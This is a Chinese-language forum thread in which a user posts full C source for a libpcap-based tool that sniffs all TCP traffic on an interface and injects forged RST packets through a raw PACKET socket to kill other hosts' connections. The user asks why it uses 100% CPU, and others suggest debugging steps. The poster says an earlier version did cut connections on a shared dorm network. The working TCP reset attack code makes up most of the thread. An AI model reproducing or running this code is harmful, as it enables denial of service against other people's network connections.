为什么这个一运行就占100%CPU？

rootclown

我用pcap 抓TCP包，然后试图切断已建立或正在建立的连接，但程序一运行
就会占用将近100%的CPU。我原来用PACKET socket 写过一个类似的，没有这种情况呀，请帮我看一下？

1. 
   
2. #include<unistd.h>;
   
3. #include<sys/types.h>;
   
4. #include<sys/socket.h>;
   
5. #include<linux/in.h>;
   
6. #include<linux/if.h>;
   
7. #include<asm/types.h>;
   
8. #include<linux/if_packet.h>;
   
9. #include<linux/if_ether.h>;
   
10. #include<linux/ip.h>;
    
11. #include<linux/tcp.h>;
    
12. #include<linux/sockios.h>;
    
13. #include<pcap.h>;
    
14. 
    
15. struct psuedohdr  {
    
16.    __u32 source_address;
    
17.    __u32 dest_address;
    
18.    unsigned char place_holder;
    
19.    unsigned char protocol;
    
20.    unsigned short length;
    
21. } psuedohdr;
    
22. 
    
23. void open_raw_sock(void);
    
24. void analyze(u_char *,const struct pcap_pkthdr *,const u_char *);
    
25. void analyze(u_char *,const struct pcap_pkthdr *,const u_char *);
    
26. void killtcp(struct ethhdr *,struct iphdr *,struct tcphdr *);
    
27. void build_eth(struct ethhdr **,struct ethhdr*);
    
28. void build_ip(struct iphdr **,struct iphdr *);
    
29. void build_tcp(struct tcphdr **,struct tcphdr *);
    
30. void __kill_tcp(char *);
    
31. int get_ifindex(int);
    
32. int in_cksum(u_short *,int);
    
33. unsigned short trans_check(unsigned char , char *, int , __u32 , __u32 );
    
34. void err_quit(char *);
    
35. void usage(void);
    
36. 
    
37. int eflag=0;
    
38. int xflag=0;
    
39. int sockk;
    
40. struct sockaddr_ll sll;
    
41. 
    
42. main(int argc,char **argv)
    
43. {
    
44.         pcap_t *handle;
    
45.         extern int opterr;
    
46.         extern char *optarg;
    
47.         char c;
    
48.         char *dev;
    
49.         struct bpf_program filter;
    
50.         char *filterp="tcp";
    
51.         char errbuf[PCAP_ERRBUF_SIZE];
    
52.         __u32 net,mask;
    
53.         opterr=0;
    
54.         while((c=getopt(argc,argv,"ex:"))!=EOF)
    
55.         {
    
56.                 switch(c)
    
57.                 {
    
58.                         case 'e':eflag=1;break;
    
59.                         case 'x':xflag=1;filterp=optarg;break;
    
60.                         default:
    
61.                                  usage();
    
62.                                  exit(0);
    
63.                 }
    
64.         }
    
65.         open_raw_sock();
    
66.         if(!(dev=pcap_lookupdev(errbuf)))
    
67.                 err_quit("pcap_lookupdev");
    
68.         if(pcap_lookupnet(dev,&net,&mask,errbuf)<0)
    
69.                 err_quit("pcap_lookupnet");
    
70.         if(!(handle=pcap_open_live(dev,2048,1,-1,errbuf)))
    
71.                 err_quit("pcap_open_live");
    
72.         if(1)
    
73.         {
    
74.                 if(pcap_compile(handle,&filter,filterp,0,mask)<0)
    
75.                         err_quit("pcap_compile");
    
76.                 if(pcap_setfilter(handle,&filter)<0)
    
77.                         err_quit("pcap_setfilter");
    
78.         }
    
79.         pcap_loop(handle,-1,analyze,NULL);
    
80. }
    
81. void analyze(u_char *usr,const struct pcap_pkthdr *pkthdr,const u_char *packet)
    
82. {
    
83.         struct ethhdr *eth;
    
84.         struct iphdr *ip;
    
85.         struct tcphdr *tcp;
    
86. 
    
87.         eth=(struct ethhdr *)packet;
    
88.         ip=(struct iphdr *)(eth+1);
    
89.         tcp=(struct tcphdr *)((u_char *)ip+(ip->;ihl<<2));
    
90.         killtcp(eth,ip,tcp);
    
91. }
    
92. void killtcp(struct ethhdr *eth,struct iphdr *ip,struct tcphdr *tcp)
    
93. {
    
94.         char bufk[2048];
    
95.         struct ethhdr *ethk;
    
96.         struct iphdr *ipk;
    
97.         struct tcphdr *tcpk;
    
98. 
    
99.         memset(bufk,0,2048);
    
100.         ethk=(struct ethhdr *)bufk;
     
101.         ipk=(struct iphdr *)(ethk+1);
     
102.         tcpk=(struct tcphdr *)(ipk+1);
     
103.         build_eth(&ethk,eth);
     
104.         build_ip(&ipk,ip);
     
105.         build_tcp(&tcpk,tcp);
     
106.         __kill_tcp(bufk);
     
107. }
     
108. void build_eth(struct ethhdr **ethk,struct ethhdr *eth)
     
109. {
     
110.         struct ethhdr *p=*ethk;
     
111. 
     
112.         memcpy(p->;h_dest,eth->;h_source,6);
     
113.         memcpy(p->;h_source,eth->;h_dest,6);
     
114.         memcpy(&p->;h_proto,&eth->;h_proto,2);
     
115. }
     
116. void build_ip(struct iphdr **ipk,struct iphdr *ip)
     
117. {
     
118.         struct iphdr *p=*ipk;
     
119. 
     
120.         p->;ihl=5;
     
121.         p->;version=4;
     
122.         p->;tos=0;////////////////////////
     
123.         p->;tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
     
124.         p->;id=htons(1234);
     
125.         p->;frag_off=0;
     
126.         p->;ttl=64;
     
127.         p->;protocol=IPPROTO_TCP;
     
128.         memcpy((u_char *)&p->;saddr,(u_char *)&ip->;daddr,sizeof(__u32));
     
129.         memcpy((u_char *)&p->;daddr,(u_char *)&ip->;saddr,sizeof(__u32));
     
130.         p->;check=(u_short)(in_cksum((u_short *)p,sizeof(struct iphdr)));////////////////////////////
     
131. }
     
132. void build_tcp(struct tcphdr **tcpk,struct tcphdr *tcp)
     
133. {
     
134.         struct tcphdr *p=*tcpk;
     
135. 
     
136.         memcpy(&p->;source,&tcp->;dest,sizeof(__u16));
     
137.         memcpy(&p->;dest,&tcp->;source,sizeof(__u16));
     
138.         if(tcp->;syn==1)
     
139.         {
     
140.                 __u32 ack_seq=htonl(ntohl(tcp->;seq)+1);
     
141.                 memcpy(&p->;ack_seq,&ack_seq,sizeof(__u32));
     
142.         }
     
143.         else
     
144.                 p->;seq=htonl(1111111);
     
145.         p->;rst=1;
     
146.         p->;doff=5;
     
147.         p->;window=htons(1024);
     
148.         p->;check=(trans_check(IPPROTO_TCP,(unsigned char * )p,sizeof(struct tcphdr ),tcp->;source,tcp->;dest));///////////////////////
     
149. }
     
150. void open_raw_sock(void)
     
151. {
     
152.         u_char *mac="\x00\x03\x0d\x09\x91\x7f";
     
153.        
     
154.         if((sockk=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_IP)))<0)
     
155.                 err_quit("socket");
     
156.         memset(&sll,0,sizeof(sll));
     
157. //        sll.sll_protocol=htons(ETH_P_IP);
     
158. //        sll.sll_ifindex=get_ifindex(sockk);
     
159.         sll.sll_family=AF_PACKET;
     
160.         memcpy(sll.sll_addr,mac,6);
     
161.         sll.sll_halen=6;
     
162.         sll.sll_ifindex=get_ifindex(sockk);
     
163. }
     
164. void __kill_tcp(char *frame)
     
165. {
     
166.         int n;
     
167.         int len;
     
168.        
     
169.         len=sizeof(struct ethhdr)+sizeof(struct iphdr)+sizeof(struct tcphdr);
     
170.         n=sendto(sockk,frame,len,0,(struct sockaddr *)&sll,sizeof(sll));
     
171.         if(n!=len)
     
172.                 err_quit("sendto");
     
173. }
     
174. int get_ifindex(int s)
     
175. {
     
176.         struct ifreq ifr;
     
177.        
     
178.         memset(&ifr,0,sizeof(ifr));
     
179.         strncpy(ifr.ifr_name,"eth0",sizeof(ifr.ifr_name)-1);
     
180.         ifr.ifr_name[sizeof(ifr.ifr_name)-1]='\0';
     
181.         if(ioctl(s,SIOCGIFINDEX,&ifr)<0)
     
182.                 err_quit("ioctl");
     
183.         return ifr.ifr_ifindex;
     
184. }
     
185. #undef        ADDCARRY
     
186. #define ADDCARRY(sum) { \
     
187.         if (sum & 0xffff0000) {        \
     
188.                 sum &= 0xffff; \
     
189.                 sum++; \
     
190.         } \
     
191. }
     
192. 
     
193. int in_cksum(u_short *addr, int len)
     
194. {
     
195.         union word {
     
196.                 char        c[2];
     
197.                 u_short        s;
     
198.         } u;
     
199.         int sum = 0;
     
200. 
     
201.         while (len >; 0) {
     
202.                 /*
     
203.                  * add by words.
     
204.                  */
     
205.                 while ((len -= 2) >;= 0) {
     
206.                         if ((unsigned long)addr & 0x1) {
     
207.                                 /* word is not aligned */
     
208.                                 u.c[0] = *(char *)addr;
     
209.                                 u.c[1] = *((char *)addr+1);
     
210.                                 sum += u.s;
     
211.                                 addr++;
     
212.                         } else
     
213.                                 sum += *addr++;
     
214.                         ADDCARRY(sum);
     
215.                 }
     
216.                 if (len == -1)
     
217.                         /*
     
218.                          * Odd number of bytes.
     
219.                          */
     
220.                         u.c[0] = *(u_char *)addr;
     
221.         }
     
222.         if (len == -1) {
     
223.                 /* The last mbuf has odd # of bytes. Follow the
     
224.                    standard (the odd byte is shifted left by 8 bits) */
     
225.                 u.c[1] = 0;
     
226.                 sum += u.s;
     
227.                 ADDCARRY(sum);
     
228.         }
     
229.         return (~sum & 0xffff);
     
230. }
     
231. unsigned short trans_check(unsigned char proto,
     
232.              char *packet,
     
233.              int length,
     
234.              __u32 source_address,
     
235.              __u32 dest_address)
     
236. {
     
237.    char *psuedo_packet;
     
238.    unsigned short answer;
     
239.    
     
240.    psuedohdr.protocol = proto;
     
241.    psuedohdr.length = htons(length);
     
242.    psuedohdr.place_holder = 0;
     
243. 
     
244.    psuedohdr.source_address = source_address;
     
245.    psuedohdr.dest_address = dest_address;
     
246.    
     
247.    if((psuedo_packet =(char *)malloc(sizeof(psuedohdr) + length)) == NULL)  {
     
248.      perror("malloc");
     
249.      exit(1);
     
250.    }
     
251.    
     
252.    memcpy(psuedo_packet,&psuedohdr,sizeof(psuedohdr));
     
253.    memcpy((psuedo_packet + sizeof(psuedohdr)),
     
254.      packet,length);
     
255.    
     
256.    answer = (unsigned short)in_cksum((unsigned short *)psuedo_packet,
     
257.                  (length + sizeof(psuedohdr)));
     
258.    free(psuedo_packet);
     
259.    return answer;
     
260. }
     
261. void err_quit(char *p)
     
262. {
     
263.         perror(p);
     
264.         exit(1);
     
265. }
     
266. void usage(void)
     
267. {
     
268. }
     

复制代码

rootclown

请帮忙看一下呀，自己顶一下

Disteliang

呵呵，谁有空去看这一大串东西

rootclown

其实并不长，因为后边的checksum计算应该不是问题，乘下的就不多了
是不是pcap有什么我用的不对？

win_hate

我粗略过了一遍，没看出什么问题。

cpu消耗是不是应该跟流量很有关系，在我这里cup消耗还不到 10%(你贴的程序,把killtcp 去掉后).

rootclown

我是在教育网（北京化工大学）里，那个程序有时运行要稍微等一下（一分钟）才能体现出占用100%，刚开始是正常的

rootclown

而且原来用PACKET socket写的就没有这种现象

win_hate

能观察到切断效果吗?

win_hate

[quote]原帖由 "rootclown"]而且原来用PACKET socket写的就没有这种现象[/quote 发表：


可以追踪一下libpcap使用了哪几个函数，然后把这几个函数的实现与你用 PACKET socket 的实现对比一下，看问题出在什么地方。

rootclown

它发出了好多RST包(我觉得应该是不正常的) ，但是好像没有切断，当时我们宿舍只有两个人上网，用交换机。
原来用PACKET socket写的还能切断呢